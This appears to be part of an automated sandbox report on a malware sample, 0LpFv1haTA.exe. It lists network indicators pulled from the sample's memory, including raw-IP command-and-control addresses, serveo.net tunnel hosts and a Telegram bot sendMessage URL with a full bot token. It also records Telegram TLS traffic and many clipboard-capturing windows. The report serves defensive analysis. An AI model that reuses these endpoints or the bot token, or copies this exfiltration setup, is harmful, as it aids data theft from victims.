Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://66.42.56.128:80
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://8.219.110.16:9999
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634//8f7482867cc6a5aec99ead5e72d7016e.serveo.net
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://95.216.147.179:80
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line?fields=query
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B16AB000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B5AB000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB52DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459D3D000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A0CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234EDF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B17CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B6CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1796000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B696000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Amcache.hve.36.dr String found in binary or memory: http://upx.sf.net
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F1126B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net
Source: ssh.exe, 00000018.00000002.4563439205.0000020D735FC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000002.4563439205.0000020D73660000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000003.3449996939.0000020D735FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net/
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://138.2.92.67:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://154.9.207.142:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://185.217.98.121:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://192.99.196.191:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://44.228.161.50:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://46.51.231.213:443
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://5.196.181.135:443
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F291000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.tele
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://node.trezor.io
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/product
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
